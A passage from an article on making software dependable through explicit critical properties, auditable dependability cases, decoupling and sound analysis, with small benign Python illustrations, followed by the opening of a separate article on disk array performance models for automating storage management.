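    # "receiving wheel pulses" with "on the ground".
    return s.wheel_pulses


def on_ground(s: Sensors) -> bool:
    # Property phrased in terms of the physical phenomenon. Writing it this
    # way exposes the evidence being relied on, so it can be scrutinized.
    return s.wheel_pulses or s.weight_on_wheels


def reverse_thrust_allowed(s: Sensors) -> bool:
    return on_ground(s)


if __name__ == "__main__":
    aquaplaning = Sensors(wheel_pulses=False, weight_on_wheels=True)
    print(reverse_thrust_allowed_as_specified(aquaplaning))  # False
    print(reverse_thrust_allowed(aquaplaning))               # True
```

The second version is not automatically safer (adding an alternative source of evidence also adds ways to enable reverse thrust in the air), but the trade-off is now visible in the statement of the property rather than buried in an unexamined equivalence.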

This view of requirements is due to Michael Jackson and has been adopted by Praxis in its REVEAL requirements engineering method. More
specialized variants of the idea have 
appeared before, most notably in Da- 
vid Parnas’s Four Variable Model.” 


The dependability case. The evidence for dependability takes the form of a dependability case: an argument that the software, in concert with other components, establishes the critical properties. What exactly comprises the case (such as how detailed it should be and what mix of formal and informal arguments is appropriate) will vary between developments, but certain features are essential.


First, the case should be auditable so that it can be evaluated by a third-party certifier, independent both of developer and customer. The effort of checking that the case is sound should be much less than the effort of building the case in the first place. In this respect, a dependability case may be like a formal proof: hard to construct but easy to check. To evaluate a case, a certifier should not need any expert knowledge of the developed system or of the particular application, although it would be reasonable to assume expertise in software engineering and familiarity with the domain area.
Second, the case should be complete. This means that the argument that the critical properties apply should contain no holes to be filled by the certifier. Any assumptions that are not justified should be noted so that it is clear to the certifier who will be responsible for discharging them. For example, the dependability case may assume that a compiler generates code correctly; or that an operating system or middleware platform transports messages reliably, relying on representations by the producers of these components that they provide the required properties; or that users obey some protocol, relying on the organization that fields the system to train them appropriately. For a product that is not designed with a particular customer in mind, the assumptions become disclaimers, for example, that an infusion pump may fail under water or that a file synchronizer will work only if applications do not subvert file modification dates. Assumptions made to simplify the case, and that are no more easily substantiated by others, are suspect. Suppose an analysis of a program written in C, for example, contains an assumption that array accesses are within bounds. If this assumption cannot readily be checked, the results of the analysis cannot be trusted.
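The completeness criterion can be partly mechanized by recording the case as data: each claim lists the evidence offered for it and the assumptions it rests on, and each assumption names who is responsible for discharging it. The structure and names below are a hypothetical sketch, not a standard format.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Assumption:
    text: str
    discharged_by: Optional[str] = None  # party responsible for it, if any


@dataclass
class Claim:
    text: str
    evidence: List[str] = field(default_factory=list)
    assumptions: List[Assumption] = field(default_factory=list)


def holes(case: List[Claim]) -> List[str]:
    """Report gaps that would otherwise be left for the certifier to fill."""
    problems: List[str] = []
    for claim in case:
        if not claim.evidence:
            problems.append(f"no evidence for claim: {claim.text}")
        for assumption in claim.assumptions:
            if assumption.discharged_by is None:
                problems.append(f"unowned assumption under '{claim.text}': "
                                f"{assumption.text}")
    return problems


if __name__ == "__main__":
    case = [
        Claim(
            "pump never delivers more than the programmed dose",
            evidence=["static analysis of the dose computation"],
            assumptions=[
                Assumption("compiler generates code correctly", "compiler vendor"),
                Assumption("array accesses in the C code are within bounds"),
            ],
        )
    ]
    for problem in holes(case):
        print(problem)
```

A check like this only finds missing evidence and unowned assumptions; it cannot judge whether an assumption such as the bounds assumption above is reasonable, which remains the certifier's job.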

Third, the case should be sound. It should not, for example, claim full correctness of a procedure on the basis of nonexhaustive testing; or make unwarranted assumptions that certain components fail independently; or reason, in a program written in a language with a weak memory model, that the value read from a shared variable is the value that was last written to it.


Implications 
On the face of it, these recommendations (that developers express the critical properties and make an explicit argument that the system satisfies them) are hardly remarkable. If followed, however, they would have profound implications for how software is procured, developed, and certified.
Dependability case as product. In theory, one could construct a dependability case ex post facto, when the entire development had been completed. In practice, however, this would be near impossible and, in any case, undesirable. Constructing the case is easier and more effective if done hand-in-hand with other development activities, when the rationale for development decisions is fresh and readily available. But there is a far more important reason to consider the dependability case from the very outset of development. By focusing on the case, the developer can make decisions that ease its construction, most notably by designing the system so that critical properties are easier to establish. Decoupling and simplicity, discussed later, offer perhaps the greatest opportunities here.

This is the key respect in which 
the direct approach to dependabil- 
ity demands a sea change in attitude. 
Rather than just setting in place some 
practices or disciplines that are in- 
tended to improve dependability, the 
developers are called upon, every step 
of the way, to consider their decisions 
in the light of the system’s depend- 
ability and to view the evidence that 
these decisions are sound as a work 
product that is as integral to the final 
system as the code itself. 

Procurement. A change to a direct ap- 
proach affects not only developers but 
also procurers, and the goals set at the 
start must be realistic in terms both of 
their achievement and demonstration. 

The Federal Aviation Administration 
specified three seconds of downtime 
per year for the infamous Advanced Au- 
tomation System for air-traffic control 
(which was ultimately canceled after 
an expenditure of several billion dol- 
lars), even though it would have taken 
10 years just to obtain the data for sub- 
stantiating such a requirement.’ It was 
later revised to five minutes. 
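The two downtime targets can be put on a common scale with a little arithmetic, assuming a 365-day year: three seconds per year corresponds to roughly seven nines of availability and five minutes to roughly five nines. The sketch below does only this conversion; it does not model why substantiating the original target would have required 10 years of data.

```python
import math

SECONDS_PER_YEAR = 365 * 24 * 3600  # 31,536,000; ignores leap years


def unavailability(downtime_seconds_per_year: float) -> float:
    """Fraction of the year the system is down."""
    return downtime_seconds_per_year / SECONDS_PER_YEAR


def nines(downtime_seconds_per_year: float) -> int:
    """Number of leading nines in the corresponding availability."""
    return math.floor(-math.log10(unavailability(downtime_seconds_per_year)))


if __name__ == "__main__":
    for label, seconds in [("3 seconds", 3), ("5 minutes", 5 * 60)]:
        print(f"{label}: availability {1 - unavailability(seconds):.9f}, "
              f"{nines(seconds)} nines")
```

The revision relaxed the requirement by a factor of 100, from about seven nines to about five.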

More fundamentally, however, our society as a whole needs to recognize that the enormous benefits of software inevitably bring risks and that functionality and dependability are inherently in conflict. If we want more dependable software, we will need to stop evaluating software on the basis of its feature set alone. At the same time, we should be more demanding, and less tolerant of poor-quality software. Too often, the users of software have been taught to blame themselves for its failures and to absorb the costs of workarounds.


After the failure of the USS York- 
town’s onboard computer system, in 
which the ship’s entire control and 
navigation network went down after an 
officer calibrating a fuel valve entered 
a zero into a database application (in 
an attempt to overwrite a bad value 
that the system had produced), blame 
was initially placed on software. After an investigation, however, the Navy cited human error. The ship’s commanding officer reported that “Managers are now aware of the problem of entering zero into database fields and are trained to bypass a bad data field and change the value if such a problem were to occur again.”

With the indirect approach to cer- 
tification, it has been traditional that 
procurers give detailed prescriptions 
for how the software should and should 
not be developed and which technolo- 
gies should be used. By contrast, the 
direct approach frees the developer to 
use the best available means to achieve 
the desired goal; constraints on the development are evaluated by the objective measure of whether they improve dependability or not.

Structuring requirements. How requirements are approached sets the tone of the development that follows. A cursory nod to analyzing the problem
can result in functionality so unrelated 
to the users’ needs that the develop- 
ers become mired in endless cycles 
of refactoring and modification. On 
the other hand, a massive and windy 
document can overwhelm the design- 
ers with irrelevant details and tie their 
hands with premature design deci- 
sions. Ironically, what a requirements 
document says can do as much dam- 
age as what it fails to say. 

In the context of dependability, the 
approach to requirements is especially 
important. The standard criteria of 
course apply: that the developers listen 
carefully to the stakeholders to under- 
stand not merely the functions they say 
they want but also, more deeply, the 
purposes they believe these functions 
will enable them to accomplish; that 
the requirements be expressed precise- 
ly and succinctly; and that great care be 
taken to avoid making irrevocable de- 
cisions when they could be postponed 
and made later on the basis of much 
fuller information. 

Two other criteria take on greater significance, however. Deciding which requirements are critical (and how critical they are) is the first and most vital design step, determining in large part the cost of the system and the contexts in which it will be usable. The architecture of the system will likely be based on these requirements, because (as explained later) the most feasible way to offer high dependability at reasonable cost is to exploit modularity to establish critical properties locally.

Second, it is important to clearly 
record any assumptions made about 
the software’s operating environment 
(including the behavior of human op- 
erators). These assumptions will be an 
integral part of the dependability case, 
influence the design, and become crite- 
ria for evaluating the contexts in which 
the software can be deployed. 

These two criteria are hardly new, 
but they are not always followed. Per- 
haps under pressure from customers 
to provide an extensive catalog of fea- 
tures, analysts often express require- 
ments as a long list of functions. In a 
radiotherapy application, for example, 
the analyst—aware of the risk of deliv- 
ering incorrect doses or of unauthor- 
ized access—might include sections 
describing the various functions or use 
cases associated with selecting doses or 
logging in but might neglect the more 
important task of describing the most 
critical properties explicitly—such as 
that the delivered dose corresponds to 
the prescribed dose and that access be 
restricted to certain staff. 
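Here is a minimal Python sketch of what stating those two critical properties explicitly might look like. Each property becomes a named predicate that can be checked against a hypothetical audit log of treatments, independently of how the dose-selection or login functions are implemented. The `Treatment` record, the dose tolerance, and the role names are illustrative assumptions, not details of any real radiotherapy system.

```python
from dataclasses import dataclass

# Hypothetical set of staff roles permitted to operate the machine.
AUTHORIZED_ROLES = {"radiotherapist", "physicist"}

@dataclass(frozen=True)
class Treatment:
    """One hypothetical treatment event, as it might appear in an audit log."""
    operator_role: str
    prescribed_dose_gy: float
    delivered_dose_gy: float

def dose_matches_prescription(t: Treatment, tolerance_gy: float = 0.01) -> bool:
    # Critical property 1: the delivered dose corresponds to the prescribed dose.
    # The tolerance is an assumed value; a real system would take it from its requirements.
    return abs(t.delivered_dose_gy - t.prescribed_dose_gy) <= tolerance_gy

def access_restricted(t: Treatment) -> bool:
    # Critical property 2: only certain staff may operate the machine.
    return t.operator_role in AUTHORIZED_ROLES

def violations(log: list[Treatment]) -> list[tuple[int, str]]:
    """Return (event index, property name) for every event that breaks a critical property."""
    checks = {
        "dose_matches_prescription": dose_matches_prescription,
        "access_restricted": access_restricted,
    }
    return [(i, name) for i, t in enumerate(log) for name, ok in checks.items() if not ok(t)]
```

For a log containing a correct treatment, one run by a receptionist, and one that delivered 2.5 Gy against a 2.0 Gy prescription, `violations` reports `[(1, "access_restricted"), (2, "dose_matches_prescription")]`. The properties are stated once and checked everywhere. They are not scattered across the use cases that might violate them.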

Sometimes developers appreciate the value of prioritization but have been shy of making the bold decisions necessary for downgrading (or eliminating) noncritical requirements. Rather than asking “What are the critical properties?” we might instead ask “What properties are not critical?” If we have trouble answering this latter question, the properties that are critical have probably not been identified correctly.

Decoupling and simplicity. How much the cost of developing a system will increase if a particular critical property is to be assured depends on how much of the system is involved. If the critical property is not localized, the entire codebase must be examined to determine whether or not it holds; in essence, all of the code becomes critical. But if the property is localized to a single component, attention can be focused on that component alone, and the rest of the codebase can be treated as noncritical. Put another way, the cost of making a system dependable should vary not with the size of the whole system but with the extent and complexity of the critical properties.

Decoupling is the key to achieving locality. Two components are decoupled if the behavior of one is unaffected by that of the other. Maximizing decoupling is a guiding principle of software design in general, but it is fundamental to dependability. It is addressed first during requirements analysis by defining functions and services so that they are self-contained and independent of one another. Then, during design, decoupling is addressed in two ways. The first is allocating functionality to particular components, which allows key invariants to be localized and communication to be minimized. The second is crafting interfaces that do not expose the internals of a service to its clients and do not connect clients to each other unnecessarily. Finally, the decoupling introduced in the design must be realized in the code by using appropriate language features to protect against errors that might compromise it.

The design of an e-commerce system, for example, might enforce a rigorous separation between billing and other subsystems; in that way, more complex (and less dependable) code can be written for less critical features (such as product search) without compromising essential financial properties.

Decoupling is an important way of securing simplicity, and its benefits, in system design. As Tony Hoare famously said in his Turing Award lecture (discussing the design of Ada): “[T]here are two ways of constructing a software design: One way is to make it so simple there are obviously no deficiencies; and the other way is to make it so complicated that there are no obvious deficiencies.” Many practitioners are resistant to the claim that simplicity is possible (and some even to the claim that it is desirable). They tend to think that the advocates of simplicity do not recognize the inherent complexity of the problems solved by computer systems, or that they imagine that simplicity is easily achieved.

Simplicity is not easy to achieve, and, as Alan Perlis noted in one of his famous aphorisms, it tends to follow complexity rather than precede it. The designer of a system that will work in a complicated and critical domain faces difficult problems. The question is not whether complexity can be eliminated but whether it can be tamed so that the resulting system is as simple as possible under the circumstances. The cost of simplicity may be high, but the cost of lowering the floodgates to complexity is higher. Edsger Dijkstra explained: “The opportunity for simplification is very encouraging, because in all examples that come to mind the simple and elegant systems tend to be easier and faster to design and get right, more efficient in execution, and much more reliable than the contrived contraptions that have to be debugged into some degree of acceptability.”*
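The billing/product-search separation in the e-commerce example above can be sketched in Python as follows. This is a minimal sketch under assumed names: `BillingService`, `charge`, `total`, and `search_products` are hypothetical. Billing keeps its ledger private and exposes a narrow interface, so its key invariant (every charge is positive) is checked at a single entry point. The search code never receives a billing object, so however complex it becomes, it cannot reach financial state through this interface.

```python
from decimal import Decimal

class BillingService:
    """Critical component: all financial state lives here and is reachable only via methods."""

    def __init__(self) -> None:
        self._charges: list[Decimal] = []  # leading underscore: private by convention only

    def charge(self, amount: Decimal) -> None:
        # The invariant "every charge is positive" is established locally, at one entry point.
        if amount <= 0:
            raise ValueError("charge must be positive")
        self._charges.append(amount)

    def total(self) -> Decimal:
        return sum(self._charges, Decimal("0"))

def search_products(catalog: list[str], query: str) -> list[str]:
    # Noncritical component: may grow complex and heuristic, but it takes no
    # billing object, so it has no path to the ledger through this interface.
    q = query.lower()
    return sorted(p for p in catalog if q in p.lower())
```

In Python the underscore prefix is only a convention. A language with enforced access control, or a process boundary between the two subsystems, would give the stronger protection the article calls for when it asks that decoupling be realized with appropriate language features.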


Process and culture. While process may not be sufficient for dependability, it is certainly necessary. A rigorous process will be needed to ensure that attention is paid to the dependability case and to preserve the chain of evidence as it is constructed. In the extreme, if there is no credible process, a certifier has no reason to believe that the deployed software even corresponds to the software that was certified. For example, in a well-known incident in 2003 an electronic voting system was certified for use in an election but a different version of the system was installed in voting booths.*®

A rigorous process need not be a burdensome one. Because every engineer involved in a project is expected to be familiar with the process, it should be described by a brief and easily understood handbook, tailored if necessary to that project. Rather than interfering with the technical work, the process should eliminate a mass of small decisions, thereby freeing the engineers to concentrate on the more creative aspects of the project. Standards for machine-processable artifacts (especially code) should be designed to maximize opportunities for automation. For example, a coding standard that mandates how variables are named and how specification comments are laid out can make it possible to extract all kinds of cross-referencing and summarization information with lexical tools alone. Bill Griswold has observed that the more the programmer embeds semantic information in the naming conventions of the code, the more readily it can be exploited.”
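To illustrate extraction "with lexical tools alone," here is a minimal sketch that assumes a hypothetical coding standard. Functions touching critical state carry a `crit_` prefix, and the line after each `def` is a `# spec:` comment stating the contract. Neither convention comes from any real standard. Under those assumptions, two regular expressions are enough to list the critical functions, collect their specifications, and flag functions whose specification is missing, all without parsing the code.

```python
import re

# Hypothetical coding-standard conventions (invented for this illustration):
#   - functions that touch critical state are named with a "crit_" prefix
#   - the line directly after each "def" line is a "# spec:" comment
DEF_RE = re.compile(r"^[ \t]*def[ \t]+(\w+)[ \t]*\(", re.MULTILINE)
SPEC_RE = re.compile(
    r"^[ \t]*def[ \t]+(\w+)[ \t]*\(.*\n[ \t]*#[ \t]*spec:[ \t]*(.+)$", re.MULTILINE
)

def summarize(source: str) -> dict[str, object]:
    """Build a cross-reference summary using regex matching only (no parsing)."""
    names = DEF_RE.findall(source)
    specs = dict(SPEC_RE.findall(source))  # function name -> spec text
    return {
        "critical": [n for n in names if n.startswith("crit_")],
        "missing_spec": [n for n in names if n not in specs],
        "specs": specs,
    }
```

Both regular expressions assume each `def` fits on one line, which is exactly the kind of layout rule such a standard would need to mandate.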

One of the paradoxes of software certification is that burdensome processes (such as requiring MC/DC, modified condition/decision coverage, in testing) do seem to be correlated with more dependable software, even though there is little compelling evidence that the processes themselves achieve their stated aims. This may be explained by a social effect. The companies that adhere to the strictest processes tend to attract and reward employees who are meticulous and risk-averse. Having a strong “safety culture” can be the major factor in determining how safe the products are, and in fact one study of formal methods found that their success may be due more to the culture surrounding them than to anything more direct. Efforts to build and maintain a strong safety culture can pay dividends. Richard Feynman, in his dissenting report following the Challenger inquiry,'° was effusive in his praise of the constructively adversarial attitude among NASA's software engineers, to which he ascribed the high dependability of their software.

Advances in software-verification technology may tempt us to imagine (in a Leibnizian fantasy) that one day we will be able to check the dependability of software simply by running it through a machine. But dependability cases will always contain informal elements that cannot be verified mechanistically; truth will have to be assessed by an impartial review not only of the case itself but also of the credibility of the organization that produced it. An entirely product-based certification approach thus makes no more sense than one based entirely on process. Given that the organization that produces the software and the software itself are intertwined, attempts at improving dependability, and efforts to measure it, must take both into account.

Robust foundations. Just as a skyscraper cannot easily be built on sand, a robust software system cannot be built on a foundation of weak tools and platforms. Fifty years after the invention of static typing and automatic memory management, the decision to use an unsafe programming language such as C or C++ (which provide neither) requires serious justification, and for a critical system the benefits that are obtained in compensation for the loss of safety have to be extraordinarily compelling. Arguments against safety based on performance are usually overstated. And with Java and C# now widely known and available, and equipped with impressive libraries, there is no longer a reason to consider safe languages as boutique technologies.

The value of static typing is often misunderstood. It is not that type errors don’t occur during execution. They do, because most statically typed languages are sufficiently complex that some checks are inevitably postponed to runtime. Similarly, the value of strong typing is not that runtime type errors are more acceptable than other kinds of failure. An unanticipated failure is never good news. Moreover, runtime type checking can make things worse: the Ariane 5 rocket might not have been lost had an arithmetic overflow in an irrelevant module not been propagated to the top level.

Strong typing has two primary benefits. First, it prevents a module from writing to regions of memory that it cannot name (through local and global variables and sequences of field accesses). This means that a syntactic dependence analysis can determine the potential couplings between modules and can be used to establish that one module is decoupled from another, thus making it possible to ignore the latter when analyzing the behavior of the former. Second, strong typing makes runtime failures happen earlier, as soon as a type error occurs, rather than later when the failure is likely to be harder to diagnose and may have done more damage. Static typing provides the important additional advantage of catching many type errors at compile time. This is extremely valuable, because type errors are often symptoms of serious mistakes and structural flaws.

Complexity in a programming lan- 
guage can compromise dependability 
because it increases the chance that the 
program will behave differently from 
what the programmer envisaged. It is 
important to avoid obscure mechanisms, especially those that have a platform-dependent interpretation.
Coding standards can be very helpful in 
taming dangerous language features.'* "” 

Progress in language design has produced major improvements, but old lessons are easily forgotten. The original design of Java, for example, lacked iterators (as a control construct) and generics, and it did not unify primitive types and objects, even though these features had been part of CLU in 1975.°’ When it was realized that these features were essential, it was too late to incorporate them cleanly. It may be curmudgeonly to complain about Java, especially because it brings so many good ideas to mainstream programming (in particular, strong typing) that might otherwise have languished in obscurity. And, to be fair, Java incorporates features of older languages in a more complex setting; subtyping, in particular, makes it much harder to incorporate other features (such as generics). Nevertheless, it does seem sad that the languages adopted by industry often lack the robustness and clarity of their academic predecessors.

It is important to recognize that dependability was not the primary goal in the design of most programming languages. Java was designed for platform independence, and its virtual machine includes a class loader that absorbs much of the complexity of installation variability. As a result, however, a simple call to a constructor in the source code sets in motion a formidable amount of machinery that could compromise the system’s dependability.

The choice of computing plat- 
form—such as operating system, mid- 
dleware, and database—must also be 
carefully considered. A platform that 
has been widely adopted for general 
applications usually has the advan- 
tage of lower cost and a larger pool of 
candidate developers. But commodity 
platforms are not usually designed for 
critical applications. Thus when high 
dependability is required, enthusiasm 
for their use should be tempered by 
the risks involved. 

The (in)significance of code. A dependability argument is a chain with
a variety of links. One link may argue 
that a software component has some 
property, another that a peripheral be- 
haves in a certain way, yet another that 
a human operator obeys some proto- 
col, and together they might establish 
the end-to-end dependability require- 
ment. But the overall argument is only 
as strong as the chain’s weakest link. 

Many software engineers and researchers are surprised to learn that the correctness of the code is rarely that weakest link. In an analysis of fatal accidents that were attributed to software problems, Donald MacKenzie found that coding errors were cited as causes only 3% of the time.” Problems with requirements and usability dwarf the problems of bugs in code, suggesting that the emphasis on coding practices and tools, both in academia and industry, may be mistaken. Exploiting tools to check arguments at the design and requirements level may be more important; and it is often more feasible, as artifacts at the higher level are much smaller.*!


Nevertheless, the correctness of code is a vital link in the dependability chain. Even if the low incidence of failures due to bugs reflects success in improving code quality, the cost is still unacceptable,'! especially when very high assurance is required. Note too that in the arena of security, code vulnerabilities are responsible for a much higher proportion of failures than in the safety arena.

Testing and analysis. Testing is a cru- 
cial part of any software-development 
process, and its effectiveness can be 
amplified by liberal use of runtime as- 
sertions, by formulating tests early on, 
by creating tests in response to bug re- 
ports, and by integrating testing into 
the build so that tests are run frequent- 
ly and automatically. But as discussed 
above, testing cannot generally deliver 
the high levels of confidence that are 
required for critical systems. Thus 
analysis is needed to fill the gap. 

Analysis might involve any of a variety of techniques, depending on the kind of property being checked and the level of confidence required. In the last decade, dramatic advances have been made in analyses that establish properties of code fully automatically through the use of theorem proving, static analysis, model checking, and model finding.

How well these techniques will work 
and how widely they will be adopted 
remain to be seen. But a number of 
industrial successes demonstrate that 
the approaches are at least feasible 
and, in the right context, effective. 
Microsoft, for example, now includes 
a sophisticated verification compo- 
nent in its driver development toolkit;? 
Praxis has achieved extraordinarily low 
defect rates using a variety of formal 
methods;'° and Airbus has used static 
analysis to show the absence of low-level runtime errors in the A340 and A380
flight-control software.’ 


Until these approaches are more widely adopted, many development teams will choose to rely instead on manual code review. In any case, it is important to realize that arguments that are not mechanically checked are likely to be flawed, so their credibility must suffer and confidence in any dependability claims that rely on them must be reduced accordingly.

The credibility of tools. Tools are enormously valuable, but the glamour of automation can sometimes overwhelm our better judgment. A symptom of this is our tendency to invest terms used to describe tools with more significance than their simple meaning. For example, inventors of program analyses have long classified their creations as “sound” or “unsound.” A sound analysis establishes a property with perfect reliability. That is, if the analysis does not report a bug, then there is no possible execution that can violate the property. This notion helpfully distinguishes verifiers from bug finders, a class of tools that are very effective at catching defects, especially in low-quality software, but that usually cannot contribute evidence of dependability because they tend to be heuristic and therefore unsound.

But the assumption that sound tools are inherently more credible is dangerous. Alex Aiken found that an unsound tool uncovered errors in a codebase that a prior analysis, using a sound tool, had failed to catch. The much higher volume of false alarms produced by the sound tool overwhelmed its users and made the real defects harder to identify.' In recent years, developers of analysis tools have come to realize that the inclusion of false positives is just as problematic as the exclusion of true positives and that more sophisticated measures are needed.

Even if an analysis establishes a property with complete assurance, the question of whether the property itself is sufficient still remains. For example, eliminating arithmetic overflows and array bounds errors from a program is certainly progress. But knowing that such faults are absent may not help the dependability case unless there is either a chain of reasoning connecting this knowledge to assertions about end-to-end properties or some strong statistical evidence that the absence of these faults is correlated with the absence of other faults.
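The article does not say which "more sophisticated measures" tool developers have adopted. One widely used pair, shown here only as an illustrative assumption, is precision (the fraction of reports that are real defects) and recall (the fraction of real defects that are reported). The counts in the usage note are invented. They show how a tool that misses nothing can still bury its few real findings in false alarms, the effect described in the Aiken anecdote above.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ToolReport:
    """Outcome of running an analysis tool on a codebase whose defects are known."""
    true_positives: int   # real defects the tool reported
    false_positives: int  # reports that are not real defects (false alarms)
    false_negatives: int  # real defects the tool missed

    def precision(self) -> float:
        # Fraction of reports worth a developer's time; falls as false alarms grow.
        # Convention: a tool that reports nothing raises no false alarms (1.0).
        reported = self.true_positives + self.false_positives
        return self.true_positives / reported if reported else 1.0

    def recall(self) -> float:
        # Fraction of real defects found. Soundness with respect to the checked
        # property means no missed violations, i.e. recall of 1.0 for that property.
        actual = self.true_positives + self.false_negatives
        return self.true_positives / actual if actual else 1.0
```

With hypothetical counts, a sound tool reporting 20 real defects among 1,000 reports scores recall 1.0 but precision 0.02 (`ToolReport(20, 980, 0)`). A bug finder reporting 15 real defects among 20 reports, while missing 5, scores 0.75 on both (`ToolReport(15, 5, 5)`). Neither number alone says which tool better supports a dependability case.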

Among analysis tools, mathematical proof is generally believed to offer the highest level of confidence. An analysis substantiated with a proof can be certified independently by examining the proof in isolation, thereby mitigating the concern that the tool that produced the proof might have been faulty.


Proof is not foolproof, however. When a bug was reported in his own code (part of the Sun Java library), Joshua Bloch found’ that the binary search algorithm harbored a subtle flaw. The algorithm had been proved correct many years before (by, among others, Jon Bentley in his Communications column), and a generation of programmers had relied upon it. The problem arose when the sum of the low and high bounds exceeded the largest representable integer. Of course, the proof wasn’t wrong in a technical sense; there was an assumption that no integer overflow would occur (which was reasonable when Bentley wrote his column, given that computer memories back then were not large enough to hold such a large array). In practice, however, such assumptions will always pose a risk, as they are often hidden in the very tools we use to reason about systems and we may not be aware of them until they are exposed.
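The hidden assumption in the binary search proof can be made concrete. Python integers never overflow, so this sketch simulates Java's 32-bit `int` arithmetic with two illustrative helpers: `to_int32` for two's-complement wraparound and `java_div` for Java's truncating integer division. Neither is a library function. The sketch contrasts the classic midpoint `(low + high) / 2` with `low + (high - low) / 2`, one of the fixes Bloch published. In Java the negative result of the naive form, used as an array index, would throw `ArrayIndexOutOfBoundsException`.

```python
def to_int32(x: int) -> int:
    """Wrap an unbounded Python int to a 32-bit two's-complement value, like a Java int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x >= (1 << 31) else x

def java_div(a: int, b: int) -> int:
    """Integer division that truncates toward zero, as Java's / does on ints."""
    q = abs(a) // abs(b)
    return q if (a >= 0) == (b > 0) else -q

def midpoint_naive(low: int, high: int) -> int:
    # The classic (low + high) / 2: the sum can exceed 2**31 - 1 and wrap negative.
    return java_div(to_int32(low + high), 2)

def midpoint_safe(low: int, high: int) -> int:
    # low + (high - low) / 2: for 0 <= low <= high, high - low cannot overflow.
    return to_int32(low + java_div(to_int32(high - low), 2))
```

For `low = 1_500_000_000` and `high = 2_000_000_000`, the naive midpoint is `-397_483_648` and the safe one is `1_750_000_000`. On small arrays the two forms agree, which is why tests on ordinary inputs never exposed the flaw.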


Closing Thoughts 

The central message of this article is that 
it is not rational to believe that a software
system is dependable without good rea- 
son. Thus any approach that promises 
to develop dependable software must 
provide such reason. A clear and explicit 
articulation is needed of what “depend- 
able” means for the system at hand, and 
an argument must be made that takes 
into account not only the correctness of 
the code but also the behavior of all the 
other components of the system, includ- 
ing human operators. 

Is this approach practical? The cost 
of constructing a dependability case, 
after all, may be high. On the other 
hand, such construction should focus 
resources, from the very start of the 
development, where they bring the 
greatest return, and the effort invested 
in obtaining a decoupled design may 
reduce the cost of maintenance later. 
The experience of Praxis shows that 
many of the approaches that the industry regards as too costly (such as formal specification and static analysis of
code) can actually reduce overall cost.” 

Similarly, even though the augmen- 
tation of testing with more ambitious 
analysis tools will require greater ex- 
pertise than is available to many teams 
today, this avenue does not necessarily 
increase the cost either. When low lev- 
els of confidence suffice, testing may be 
the most cost-effective way to establish 
dependability. As the required level of 
confidence rises, though, testing soon 
becomes prohibitively expensive, and 
the use of more sophisticated methods 
is likely to be more economical. Invari- 
ants may be harder to write than test 
cases, but a single invariant defines an 
infinite number of test cases, so a de- 
cision to write one (and use a tool that 
checks all the cases it defines) will pay 
off very soon. 
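A minimal sketch of how one invariant stands in for many test cases. A single predicate (the output is ordered and is a permutation of the input) acts as the oracle for every generated input, so no expected outputs are written by hand. Random sampling, used here for brevity, is not the exhaustive checking the paragraph has in mind. A model checker or prover would be needed to cover all the cases the invariant defines. `insertion_sort` is a hypothetical function under test.

```python
import random
from collections import Counter
from typing import Callable, Optional

def insertion_sort(xs: list[int]) -> list[int]:
    """Hypothetical function under test."""
    out: list[int] = []
    for x in xs:
        i = len(out)
        while i > 0 and out[i - 1] > x:  # walk left past larger elements
            i -= 1
        out.insert(i, x)
    return out

def sort_invariant(inp: list[int], out: list[int]) -> bool:
    """One invariant defining unboundedly many test cases: the output is in
    nondecreasing order and is a permutation of the input."""
    ordered = all(a <= b for a, b in zip(out, out[1:]))
    return ordered and Counter(inp) == Counter(out)

def find_counterexample(sort_fn: Callable[[list[int]], list[int]],
                        trials: int = 1000, seed: int = 0) -> Optional[list[int]]:
    """Check the invariant on randomly generated inputs (sampling, not exhaustive
    checking); return the first input that violates it, or None."""
    rng = random.Random(seed)
    for _ in range(trials):
        xs = [rng.randint(-50, 50) for _ in range(rng.randint(0, 20))]
        if not sort_invariant(xs, sort_fn(list(xs))):  # pass a copy to sort_fn
            return xs
    return None
```

`find_counterexample(insertion_sort)` returns `None`. A broken "sort" such as `lambda xs: xs` is caught on the first unsorted input, with no hand-written expected output.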

Efforts to make software more de- 
pendable or secure are inherently con- 
servative and therefore risk retarding 
progress, and many practitioners under- 
standably see certification schemes and 
standards as millstones around their 
necks. But because a direct approach 
based on dependability cases gives developers an incentive to use whatever development methods and tools are most economical and effective, the approach rewards innovation.
Disk Array Models for Automating
Storage Management


By Arif Merchant 


LARGE DISK ARRAYS are everywhere, 
even if we, as end users of computer 
services, rarely notice them. When we 
shop at an Internet retailer, the prod- 
uct and account data come from a disk 
array in a data center. Our email, bank- 
ing, payroll, insurance, and tax data all 
reside on disk arrays. The hardware 
used is typically diverse, obtained from 
multiple vendors at different times. 
Depending upon an application’s requirements for throughput, response time, availability, and reliability, its data may be distributed across disk arrays and even across multiple data centers and made resilient to failures through replication or the addition of error correction codes.


Managing disk array storage is extremely complex, involving tasks such as initially placing the data, arranging for data backup, prioritizing data access so that each application can receive the performance it requires, periodically migrating data from one disk array to another, monitoring performance, and diagnosing any performance problems found. Some partially automated tools can assist the operator, but in the end, storage management is a manually intensive process. As a result, management decisions are geared toward simplifying implementation, rather than optimizing application performance.

The key to reducing costs and improving the performance and dependability of storage is to automate the management tasks, because computers can keep track of complex environments and intricate decisions better than human beings. However, the management system must understand the behavior of the storage system it manages. For example, when a new database server is to be installed, where should its data be placed? Would one of the existing disk arrays in the data center suffice, or is a new one needed? An automated management system can consider numerous options to make an informed decision, but it must be able to predict the performance impact of each option. In other words, the management system needs a model to answer the question “How will my applications’ storage performance change if I take this option?”

Building accurate performance models of storage systems has long been a stumbling block to designing automated storage management systems, because one needs to be able to build models, quickly and easily, for the multitude of disk arrays in use, and for a wide variety of workloads. While models of basic disk drives for simple workloads are known, most data centers use disk arrays, which are much more complex because they aggregate a number of disks with cache and control firmware. Earlier disk array performance models either were hand-built for each disk array model and required extensive tuning for good accuracy, or were based on benchmark measurements of a few workloads on the device. In either case, the models were only accurate for workloads similar to those used to build the models.

